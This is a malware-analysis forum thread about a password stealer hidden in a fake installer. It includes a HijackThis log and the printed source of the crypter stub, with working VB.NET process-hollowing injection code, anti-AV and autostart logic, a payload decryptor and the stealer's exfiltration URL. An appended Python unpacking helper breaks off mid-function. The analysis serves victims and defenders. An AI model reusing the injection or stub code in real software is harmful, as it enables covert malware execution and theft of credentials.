#1 18 February 2011 Last edited by a moderator: 14 April 2017
Okay, apparently you can't even trust your favourite music site anymore. Anyway, ran it today with admin rights, which is normal for installations; I was puzzled by the bin files that were only there as decoration. I have Win7 64-bit.
Antivirus scan for 41dc79c0b1fb809cc4dcd00b7870d1d33dbf399120dc5bfe23f4aeee1e2d4ce9 at 2011-02-17 23:59:07 UTC - VirusTotal
Code:
```
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 01:20:05, on 18.02.2011
Platform: Windows 7 (WinNT 6.00.3504)
MSIE: Internet Explorer v8.00 (8.00.7600.16722)
Boot mode: Normal

Running processes:
C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe
C:\Program Files (x86)\Trillian\trillian.exe
C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe
C:\Program Files (x86)\DivX\DivX Plus Web Player\DDMService.exe
C:\Program Files (x86)\xchat\xchat.exe
C:\Program Files (x86)\Last.fm\LastFM.exe
C:\Program Files (x86)\FlashFXP 4\FlashFXP.exe
C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\AAM Updates Notifier.exe
C:\Program Files (x86)\FlashFXP 4\FlashFXP.exe
C:\Program Files (x86)\Lavasoft\Ad-Aware\AAWTray.exe
C:\Program Files (x86)\FlashFXP 4\FlashFXP.exe
C:\Program Files (x86)\Mozilla Firefox\firefox.exe
C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
C:\Program Files (x86)\Mozilla Thunderbird\thunderbird.exe
C:\Users\****\Downloads\HiJackThis204.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
F2 - REG:system.ini: UserInit=userinit.exe
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: Increase performance and video formats for your HTML5 <video> - {326E768D-4182-46FD-9C16-1449A49795F4} - C:\Program Files (x86)\DivX\DivX Plus Web Player\npdivx32.dll
O2 - BHO: Use the DivX Plus Web Player to watch web videos with less interruptions and smoother playback on supported sites - {593DDEC6-7468-4cdd-90E1-42DADAA222E9} - C:\Program Files (x86)\DivX\DivX Plus Web Player\npdivx32.dll
O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\PROGRA~2\Microsoft Office\Office14\GROOVEEX.DLL
O2 - BHO: SkypeIEPluginBHO - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll
O2 - BHO: URLRedirectionBHO - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\PROGRA~2\Microsoft Office\Office14\URLREDIR.DLL
O2 - BHO: Ask Toolbar BHO - {D4027C7F-154A-4066-A1AD-4243D8127440} - C:\Program Files (x86)\Ask.com\GenericAskToolbar.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre6\bin\jp2ssv.dll
O2 - BHO: Microsoft-Webtestaufzeichnung 10.0-Hilfsprogramm - {DDA57003-0068-4ed2-9D32-4D1EC707D94D} - C:\Program Files (x86)\Microsoft Visual Studio 10.0\Common7\IDE\PrivateAssemblies\Microsoft.VisualStudio.QualityTools.RecorderBarBHO100.dll
O3 - Toolbar: Foxit Toolbar - {D4027C7F-154A-4066-A1AD-4243D8127440} - C:\Program Files (x86)\Ask.com\GenericAskToolbar.dll
O4 - HKCU\..\Run: [DAEMON Tools Lite] "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
O4 - Startup: Trillian.lnk = C:\Program Files (x86)\Trillian\trillian.exe
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\Microsoft Office\Office14\EXCEL.EXE/3000
O8 - Extra context menu item: Nach Microsoft &Excel exportieren - res://C:\PROGRA~2\Microsoft Office\OFFICE11\EXCEL.EXE/3000
O8 - Extra context menu item: Se&nd to OneNote - res://C:\PROGRA~1\Microsoft Office\Office14\ONBttnIE.dll/105
O9 - Extra button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: Se&nd to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
O9 - Extra button: OneNote Lin&ked Notes - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
O9 - Extra 'Tools' menuitem: OneNote Lin&ked Notes - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
O9 - Extra button: Skype Plug-In - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll
O9 - Extra 'Tools' menuitem: Skype Plug-In - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll
O9 - Extra button: Recherchieren - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~2\Microsoft Office\OFFICE11\REFIEBAR.DLL
O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll
O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll
O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll
O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll
O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll
O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll
O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll
O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll
O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll
O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll
O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll
O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll
O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll
O18 - Protocol: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~2\COMMON~1\Skype\Skype4COM.dll
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: Ati External Event Utility - Unknown owner - C:\Windows\system32\Ati2evxx.exe (file missing)
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: FLEXnet Licensing Service - Acresso Software Inc. - C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
O23 - Service: FLEXnet Licensing Service 64 - Acresso Software Inc. - C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService64.exe
O23 - Service: LogMeIn Hamachi 2.0 Tunneling Engine (Hamachi2Svc) - LogMeIn Inc. - C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2.exe
O23 - Service: HASP License Manager (hasplms) - Unknown owner - C:\Windows\system32\hasplms.exe (file missing)
O23 - Service: HTTP Debugger (HTTPDebugger) - MadeForNet.com - C:\Program Files (x86)\HTTP Debugger Pro\mfnsvc.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: KMService - Unknown owner - C:\Windows\system32\srvany.exe
O23 - Service: Lavasoft Ad-Aware Service - Lavasoft Limited - C:\Program Files (x86)\Lavasoft\Ad-Aware\AAWService.exe
O23 - Service: Process Monitor (LVPrcS64) - Logitech Inc. - C:\Program Files\Common Files\Logishrd\LVMVFM\LVPrcSrv.exe
O23 - Service: McAfee Security Scan Component Host Service (McComponentHostService) - McAfee, Inc. - C:\Program Files (x86)\McAfee Security Scan\2.0.181\McCHSvc.exe
O23 - Service: mental ray 3.8 Satellite for Autodesk 3ds Max Design 2011 32-bit 32-bit (mi-raysat_3dsmax2011_32) - Unknown owner - C:\Program Files (x86)\Autodesk\3ds Max Design 2011\mentalimages\satellite\raysat_3dsmax2011_32server.exe
O23 - Service: mental ray 3.8 Satellite for Autodesk 3ds Max Design 2011 64-bit 64-bit (mi-raysat_3dsmax2011_64) - Unknown owner - C:\Program Files\Autodesk\3ds Max Design 2011\mentalimages\satellite\raysat_3dsmax2011_64server.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: NIHardwareService - Native Instruments GmbH - C:\Program Files\Common Files\Native Instruments\Hardware\NIHardwareService.exe
O23 - Service: PACE License Services (PaceLicenseDServices) - PACE Anti-Piracy, Inc. - C:\Program Files (x86)\Common Files\PACE\Services\LicenseServices\LDSvc.exe
O23 - Service: PnkBstrA - Unknown owner - C:\Windows\system32\PnkBstrA.exe
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Sage Registry Service (Registry) - Sage KHK Software - C:\Program Files (x86)\Common Files\Sage KHK Shared\REGISTRY.EXE
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe
O23 - Service: SwitchBoard - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 11312 bytes
```
The exe in question: No File | www.xup.in
#2 18 February 2011 Re: What is it, what does it do?
VM on -> Wireshark on -> run Setup.exe -> look at the changed files -> look at the Wireshark log -> [what is it, what does it do] (a debugger would also be quite handy, but that requires prior knowledge -> code analysis). Regards
PS: I would remove my account name from the log..
PS2: The author is registered at hackforums.net, by the way; at least that's where he steals his code together from..
//edit: Log looks clean.
Code injection into avcenter.exe
Autostart via registry SOFTWARE\Microsoft\Windows\CurrentVersion\Run (\temp.exe?)
"Crypted" via the $10 BlackBloodCrypter2.2 and Base64^^ ...
#3 18 February 2011 Re: What is it, what does it do?
I have no temp.exe. According to OllyDbg it first kills the AVs. Well, let it run in the VM; according to Sandboxie it messes around with 3 files. Under the XP VM it doesn't even run; the Win7 VM opens explorer, leaves nothing in the windir or autostart, no data flows. Just sniffed it with Wireshark, crazy thing.
#4 18 February 2011 Re: What is it, what does it do?
A copy/paste kiddie crypter was used there... it's not really worth starting Wireshark, just look at the source code:
Code:
```csharp
public static void Main()
{
    ResourceManager manager = new ResourceManager("TempRes", Assembly.GetExecutingAssembly());
    byte[] inArray = (byte[]) manager.GetObject("crypted");
    string newValue = manager.GetString("settings");
    BindedData = manager.GetString("bind");
    RunPE = manager.GetString("runpe");
    char ch = '%';
    string[] strArray = newValue.Split(new char[] { ch });
    string str8 = strArray[4];
    string str2 = strArray[5];
    string str = strArray[3];
    string str6 = strArray[11];
    string str4 = strArray[6];
    string str3 = strArray[10];
    string str5 = strArray[12];
    if (str3 == "1")
    {
        OnlineSub(); // checks whether the internet is up
    }
    if (str == "1")
    {
        Daanteys.Enable(); // anti AV/VM/sandbox
    }
    if (str2 == "1")
    {
        Thread thread = new Thread(new ThreadStart(Stub.BindSub));
        thread.IsBackground = true;
        thread.Start();
    }
    if (str8 == "1")
    {
        AddStartUp();
    }
    RunPE = RunPE.Replace("%%CDATA%%", CD.format(Convert.ToBase64String(inArray))); // the actual malware
    RunPE = RunPE.Replace("%%Settings%%", newValue);
    if (str5 == "DefBrw")
    {
        str5 = defaultbrowser();
    }
    RunPE = RunPE.Replace("%%INJECT%%", str5);
    Execute(RunPE); // execute in memory
    if (str4 == "1")
    {
        switch (strArray[7])
        {
            case "":
                Interaction.MsgBox(strArray[8], MsgBoxStyle.Critical, strArray[9]);
                goto Label_023D;
            case "Exclamation":
                Interaction.MsgBox(strArray[8], MsgBoxStyle.Exclamation, strArray[9]);
                goto Label_023D;
            case "Critical":
                Interaction.MsgBox(strArray[8], MsgBoxStyle.Critical, strArray[9]);
                goto Label_023D;
            case "Question":
                Interaction.MsgBox(strArray[8], MsgBoxStyle.Question, strArray[9]);
                break;
            case "Information":
                Interaction.MsgBox(strArray[8], MsgBoxStyle.Information, strArray[9]);
                break;
        }
    }
Label_023D:
    if (str6 == "1")
    {
        MeltME(); // delete itself
    }
}
```
The settings are the following:
Code:
```
9%AES%cFwmeodjIGLViDo%0%0%0%0%Critical%%%0%0%explorer.exe%
```
The method that executes the actual malicious program is compiled on the fly, and the source looks like this:
Code:
```vbnet
Imports System.Text
Imports System.Runtime.InteropServices
Imports System
Imports Microsoft.VisualBasic
Imports System.ComponentModel
Imports System.IO.Compression
Imports System.IO

Namespace Inject
    Public Class RunPE
        Public Shared Function DoStuff() As Boolean
            Dim Setting As String = "%%Settings%%"
            Dim FileSplit As Char = "%%BlackBloodCrypter2.2%%"
            Dim SplitedData() as String = Setting.Split(FileSplit)
            Dim Password As String = SplitedData(2)
            Dim Encryption As String = SplitedData(1)
            Dim CryptData As String = %%CDATA%%
            Dim InjectInto as String = "%%INJECT%%"
            If Environment.OSVersion.Platform.ToString.Contains("32") OrElse Environment.OSVersion.Platform.ToString.Contains("86") Then
                If Encryption = "RC4" Then
                    InjectPE(RC4(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), InjectInto)
                ElseIf Encryption = "AES" Then
                    InjectPE(AES_Decrypt(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), InjectInto)
                ElseIf Encryption = "DES" Then
                    InjectPE(DES_Decrypt(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), InjectInto)
                ElseIf Encryption = "RC2" Then
                    InjectPE(RC2_Decrypt(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), InjectInto)
                ElseIf Encryption = "STR" Then
                    InjectPE(Crypt(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), InjectInto)
                ElseIf Encryption = "TDES" Then
                    InjectPE(TDES_Decrypt(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), InjectInto)
                End If
            Else
                If Encryption = "RC4" Then
                    InjectPE(RC4(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") & "Microsoft.NET\Framework\v2.0.50727\vbc.exe")
                ElseIf Encryption = "AES" Then
                    InjectPE(AES_Decrypt(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") & "Microsoft.NET\Framework\v2.0.50727\vbc.exe")
                ElseIf Encryption = "DES" Then
                    InjectPE(DES_Decrypt(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") & "Microsoft.NET\Framework\v2.0.50727\vbc.exe")
                ElseIf Encryption = "RC2" Then
                    InjectPE(RC2_Decrypt(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") & "Microsoft.NET\Framework\v2.0.50727\vbc.exe")
                ElseIf Encryption = "STR" Then
                    InjectPE(Crypt(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") & "Microsoft.NET\Framework\v2.0.50727\vbc.exe")
                ElseIf Encryption = "TDES" Then
                    InjectPE(TDES_Decrypt(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") & "Microsoft.NET\Framework\v2.0.50727\vbc.exe")
                End If
            End If
            Return True
        End Function

        Public Shared Function AES_Decrypt(ByVal input As Byte(), ByVal pass As Byte()) As Byte()
            Dim AES As New System.Security.Cryptography.RijndaelManaged
            Dim Hash_AES As New System.Security.Cryptography.MD5CryptoServiceProvider
            Dim decrypted() As Byte
            Try
                Dim hash(31) As Byte
                Dim temp As Byte() = Hash_AES.ComputeHash(pass)
                Array.Copy(temp, 0, hash, 0, 16)
                Array.Copy(temp, 0, hash, 15, 16)
                AES.Key = hash
                AES.Mode = Security.Cryptography.CipherMode.ECB
                Dim DESDecrypter As System.Security.Cryptography.ICryptoTransform = AES.CreateDecryptor
                Dim Buffer As Byte() = input
                decrypted = DESDecrypter.TransformFinalBlock(Buffer, 0, Buffer.Length)
                Return decrypted
            Catch ex As Exception
                Return Nothing
            End Try
        End Function

        .....

        <DllImport("kernel32")> _
        Private Shared Function CreateProcess(ByVal appName As String, ByVal commandLine As StringBuilder, ByVal procAttr As IntPtr, ByVal thrAttr As IntPtr, <MarshalAs(UnmanagedType.Bool)> ByVal inherit As Boolean, ByVal creation As Integer, _
            ByVal env As IntPtr, ByVal curDir As String, ByVal sInfo As Byte(), ByVal pInfo As IntPtr()) As <MarshalAs(UnmanagedType.Bool)> Boolean
        End Function

        <DllImport("kernel32")> _
        Private Shared Function GetThreadContext(ByVal hThr As IntPtr, ByVal ctxt As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
        End Function

        <DllImport("ntdll")> _
        Private Shared Function NtUnmapViewOfSection(ByVal hProc As IntPtr, ByVal baseAddr As IntPtr) As UInteger
        End Function

        <DllImport("kernel32")> _
        Private Shared Function ReadProcessMemory(ByVal hProc As IntPtr, ByVal baseAddr As IntPtr, ByRef bufr As IntPtr, ByVal bufrSize As Integer, ByRef numRead As IntPtr) As <MarshalAs(UnmanagedType.Bool)> Boolean
        End Function

        <DllImport("kernel32.dll")> _
        Private Shared Function ResumeThread(ByVal hThread As IntPtr) As UInteger
        End Function

        Declare Function usegfsuiefgseuf Lib "kernel32" Alias "SetThreadContext" (ByVal hThr As IntPtr, ByVal ctxt As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean

        <DllImport("kernel32")> _
        Private Shared Function VirtualAllocEx(ByVal hProc As IntPtr, ByVal addr As IntPtr, ByVal size As IntPtr, ByVal allocType As Integer, ByVal prot As Integer) As IntPtr
        End Function

        <DllImport("kernel32", CharSet:=CharSet.Auto, SetLastError:=True)> _
        Private Shared Function VirtualProtectEx(ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, ByVal dwSize As IntPtr, ByVal flNewProtect As UInteger, ByRef lpflOldProtect As UInteger) As Boolean
        End Function

        <DllImport("kernel32.dll", SetLastError:=True)> _
        Private Shared Function WriteProcessMemory(ByVal hProcess As IntPtr, ByVal lpBaseAddress As IntPtr, ByVal lpBuffer As Byte(), ByVal nSize As UInteger, ByVal lpNumberOfBytesWritten As Integer) As Boolean
        End Function

        Public Shared Function InjectPE(ByVal bytes() as Byte, ByVal InjectInto as String) As Boolean
            Try
                Dim procAttr As IntPtr = IntPtr.Zero
                Dim processInfo As IntPtr() = New IntPtr(3) {}
                Dim startupInfo As Byte() = New Byte(67) {}
                Dim num2 As Integer = BitConverter.ToInt32(bytes, 60)
                Dim num As Integer = BitConverter.ToInt16(bytes, num2 + 6)
                Dim ptr4 As New IntPtr(BitConverter.ToInt32(bytes, num2 + &H54))
                If CreateProcess(Nothing, New StringBuilder(InjectInto), procAttr, procAttr, False, 4, _
                                 procAttr, Nothing, startupInfo, processInfo) Then
                    Dim ctxt As UInteger() = New UInteger(178) {}
                    ctxt(0) = &H10002
                    If GetThreadContext(processInfo(1), ctxt) Then
                        Dim baseAddr As New IntPtr(ctxt(&H29) + 8L)
                        Dim buffer__1 As IntPtr = IntPtr.Zero
                        Dim bufferSize As New IntPtr(4)
                        Dim numRead As IntPtr = IntPtr.Zero
                        If ReadProcessMemory(processInfo(0), baseAddr, buffer__1, CInt(bufferSize), numRead) AndAlso (NtUnmapViewOfSection(processInfo(0), buffer__1) = 0) Then
                            Dim addr As New IntPtr(BitConverter.ToInt32(bytes, num2 + &H34))
                            Dim size As New IntPtr(BitConverter.ToInt32(bytes, num2 + 80))
                            Dim lpBaseAddress As IntPtr = VirtualAllocEx(processInfo(0), addr, size, &H3000, &H40)
                            Dim lpNumberOfBytesWritten As Integer
                            WriteProcessMemory(processInfo(0), lpBaseAddress, bytes, CUInt(CInt(ptr4)), lpNumberOfBytesWritten)
                            Dim num5 As Integer = num - 1
                            For i As Integer = 0 To num5
                                Dim dst As Integer() = New Integer(9) {}
                                Buffer.BlockCopy(bytes, (num2 + &HF8) + (i * 40), dst, 0, 40)
                                Dim buffer2 As Byte() = New Byte((dst(4) - 1)) {}
                                Buffer.BlockCopy(bytes, dst(5), buffer2, 0, buffer2.Length)
                                addr = New IntPtr(buffer2.Length)
                                size = New IntPtr(lpBaseAddress.ToInt32() + dst(3))
                                WriteProcessMemory(processInfo(0), size, buffer2, CUInt(addr), lpNumberOfBytesWritten)
                            Next
                            size = New IntPtr(ctxt(&H29) + 8L)
                            addr = New IntPtr(4)
                            WriteProcessMemory(processInfo(0), size, BitConverter.GetBytes(lpBaseAddress.ToInt32()), CUInt(addr), lpNumberOfBytesWritten)
                            ctxt(&H2C) = CUInt(lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, num2 + 40))
                            usegfsuiefgseuf(processInfo(1), ctxt)
                        End If
                    End If
                    ResumeThread(processInfo(1))
                End If
            Catch
                Return False
            End Try
            Return True
        End Function
```
What's interesting is which exe it gets injected into, but that's easy to see in the source code... Now how do you get at the malware in an elegant way? Quite simple: copy the decisive method (AES Decrypt), paste it into Visual Studio and decrypt the exe with the given password... Hmpf, there's no room left for the actual malware -> RR post character limit :lol:
#5 18 February 2011 Re: What is it, what does it do?
I'm somehow too dumb for this right now. What does it do / what has it done now, and how do I get rid of it again?
#6 18 February 2011 Re: What is it, what does it do?
Decrypt method in C#:
Code:
```csharp
using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;

static void Main(string[] args)
{
    string pathInput = @"C:\Users\Admin\Downloads\crypted";
    string pathOutput = @"C:\Users\Admin\Downloads\crypted.exe";
    string password = "cFwmeodjIGLViDo";

    // read the "crypted" resource dumped from the stub
    BinaryReader b = new BinaryReader(File.Open(pathInput, FileMode.Open));
    byte[] buffer = b.ReadBytes((int)b.BaseStream.Length);
    b.Close();

    // same key schedule as the stub's AES_Decrypt, including the overlapping copy at offset 15
    RijndaelManaged rj = new RijndaelManaged();
    MD5CryptoServiceProvider crp = new MD5CryptoServiceProvider();
    byte[] hash = crp.ComputeHash(Encoding.Default.GetBytes(password));
    byte[] hashpw = new byte[32];
    Array.Copy(hash, 0, hashpw, 0, 16);
    Array.Copy(hash, 0, hashpw, 15, 16);
    rj.Key = hashpw;
    rj.Mode = CipherMode.ECB;
    ICryptoTransform transform = rj.CreateDecryptor();

    byte[] decrypted = null;
    try
    {
        decrypted = transform.TransformFinalBlock(buffer, 0, buffer.Length);
    }
    catch (CryptographicException ex)
    {
        Console.WriteLine(ex.ToString());
        Console.Read();
        return; // nothing to write if decryption failed
    }

    BinaryWriter writeBinay = new BinaryWriter(new FileStream(pathOutput, FileMode.Create));
    writeBinay.Write(decrypted);
    writeBinay.Close();
}
```
VirusTotal scan of the decrypted exe: Antivirus scan for 26bb9902c8cf721300929c7d967dc989b736d4572fbca8fa607eb5e11fd5daac at 2011-02-18 19:46:34 UTC - VirusTotal
At a quick glance I'd say: there is a very good password stealer (construction kit!) in there. The data is sent to a PHP script:
Code:
```
http://46.182.124.42/index2.php
```
The stealer also detects whether Wireshark is running! It probably doesn't nest itself into the system, but e.g. your Firefox passwords are now with the kiddie. Still, go through your autostart list with Autoruns from Sysinternals.
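For the stub dissected in #4 and the decrypt method in #6, here is an analyst-side re-implementation in Python (an added example, not code from the thread): it names the '%'-separated settings fields the way Main() indexes them, reproduces the stub's MD5-based key schedule including the overlapping Array.Copy, and sanity-checks that the AES-ECB output is a PE before anything is handed to a sandbox. The third-party cryptography package and cp1252 as the value of Encoding.Default are assumptions.

```python
"""Added analyst helper for the BlackBloodCrypter 2.2 stub shown in this thread.

Not code from the thread: it re-implements the stub's settings layout and key
schedule in Python so the embedded payload can be unpacked offline. Assumes the
third-party 'cryptography' package and that Encoding.Default on the victim box
was cp1252 (identical to ASCII for the password seen here).
"""
import hashlib
import sys
from typing import Dict, List

# Field positions copied from the stub's Main(): the strArray[n] checks.
SETTINGS_FIELDS = {
    1: "encryption", 2: "password", 3: "anti_av_vm_sandbox", 4: "add_startup",
    5: "run_bound_file", 6: "show_msgbox", 7: "msgbox_style", 8: "msgbox_text",
    9: "msgbox_title", 10: "check_online", 11: "melt_self", 12: "inject_into",
}

# Settings string quoted in post #4 (the thread's own sample, not constructed).
SAMPLE_SETTINGS = "9%AES%cFwmeodjIGLViDo%0%0%0%0%Critical%%%0%0%explorer.exe%"


def parse_settings(settings: str, sep: str = "%") -> Dict[str, str]:
    """Split the settings blob the way Main() does and name each field."""
    parts = settings.split(sep)
    if len(parts) < 13:
        raise ValueError("settings string shorter than the stub's 13 fields")
    return {name: parts[idx] for idx, name in SETTINGS_FIELDS.items()}


def enabled_features(settings: str) -> List[str]:
    """Flags that Main() tests for the literal '1' before acting on them."""
    cfg = parse_settings(settings)
    flags = ("anti_av_vm_sandbox", "add_startup", "run_bound_file",
             "show_msgbox", "check_online", "melt_self")
    return [f for f in flags if cfg[f] == "1"]


def derive_key(password: str, codepage: str = "cp1252") -> bytes:
    """Reproduce AES_Decrypt's 32-byte key, quirk included.

    The stub MD5-hashes the password, copies the 16 digest bytes to offset 0
    and then again to offset 15, so byte 15 becomes digest[0] and byte 31
    stays zero. A textbook MD5||MD5 key differs in those two bytes and would
    not decrypt the payload.
    """
    digest = hashlib.md5(password.encode(codepage)).digest()
    key = bytearray(32)
    key[0:16] = digest   # Array.Copy(temp, 0, hash, 0, 16)
    key[15:31] = digest  # Array.Copy(temp, 0, hash, 15, 16)
    return bytes(key)


def decrypt_payload(blob: bytes, password: str) -> bytes:
    """AES-256-ECB with PKCS7 padding: the RijndaelManaged defaults the stub uses."""
    from cryptography.hazmat.primitives import padding
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    dec = Cipher(algorithms.AES(derive_key(password)), modes.ECB()).decryptor()
    padded = dec.update(blob) + dec.finalize()
    unpad = padding.PKCS7(128).unpadder()
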